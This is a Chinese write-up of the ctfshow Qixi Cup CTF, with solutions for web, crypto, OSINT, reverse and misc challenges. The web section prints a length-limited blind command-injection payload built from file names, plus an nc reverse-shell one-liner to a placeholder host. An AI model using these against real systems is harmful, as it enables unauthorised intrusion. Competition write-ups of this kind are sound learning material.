ctfshow七夕杯WP

警告
本文最后更新于 2023-02-01,文中内容可能已过时。

ctfshow七夕杯WP

这次比赛在最后掉出了前十 错过了奖品

挺可惜的 下次再接再厉

web

web签到

限制长度无回显命令执行

https://xz.aliyun.com/t/2748#toc-4

我弹了半天shell发现弹不出来

然后构造的不出网命令执行

ls echo "Lw=="|base64 -d>1.php

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
>php
>1.\\
>\>\\
>-d\`\\
>\ \\
>64\\
>base\\
>\"\|\\
>Lw==\\
>\ \"\\
>echo\\
>\ \`\\
>ls\\
ls -t>_
sh _
1
bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var

head echo "L2ZsYWc="|base64 -d>1.php

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
>php
>1.\\
>\>\\
>-d\`\\
>\ \\
>64\\
>base\\
>\"\|\\
>YWc=\\
>L2Zs\\
>\ \"\\
>echo\\
>\ \`\\
>head\\
ls -t>_
sh _

easy_cmd

nc主动弹shell

1
nc xxx.xxx.xxx.xxx port -e /bin/sh

image-20220806002133314

1
ctfshow{2da5bf48-12af-49d6-85f4-aea75df35b24}

CRYPTO

密码签到

大牛在今年的hvv过程中,渗透进某业务系统,发现了密文,可是不知道如何解出明文,你能帮他找出来吗?

已知密文由两部分组成,后面的推测为秘钥

密文如下:

y3rmc2hvd3tjcnlwdg9fc2lnbmlux2lzx2vhc3l9-a0004008a0

应该是base64大小写爆破

我没有脚本 直接解base64然后猜的

image-20220805231907876

1
ctfshow{crypto_signin_is_easy}

osint

社工签到

大牛梦寐以求的地方,你能找到照片所属小镇名字吗?

格式ctfshow{小镇名字}

例如ctfshow{童话小镇}

直接百度搜图可以搜到一篇旅游文章

可以知道为天涯镇

1
格式ctfshow{小镇名字}
1
ctfshow{天涯小镇}

迷失的大象

感谢@大菜鸡供题

图中是去年一路北上的大象,出发时有17头,但是中途一对大象喝醉,被遣返回原籍,剩15头了,你能找到那对象回哪里去了吗?

flag格式ctfshow{原籍县区全称}

https://travel.sohu.com/a/559674305_121390700

可以知道是普洱墨江

搜索可知

1
ctfshow{墨江哈尼族自治县}

大飞机

请根据图中线索,找到飞机航班号,字母大写

格式ctfshow{航班号}

如:ctfshow{FK777}

Google搜索可得型号为波音747-8 百度识图知道公司为国航

搜索得到

image-20220804190628868

1
ctfshow{CA981}

re

逆向签到

010打开搜ctfshow能发现

image-20220806003313221

1
ctfshow{Hºre_sign_H‰EÐH‰UØH¸is_easy_H‰EàfÇEè}

还是猜flag

1
ctfshow{re_sign_is_easy_}

misc

杂项签到

flag在图片尾

image-20220805232042450

1
ctfshow{misc_sign_is_easy}

你会lsb吗

下载下来发现文件的16进制是倒过来的

正序后解压得到一个stego.png

注意图片尾有一个ctfshow

image-20220805232244666

结合lsb猜测为有密码的lsb隐写

cloacked-pixel

1
python lsb.py extract stego.png ctfshow

得到一串emoji

0%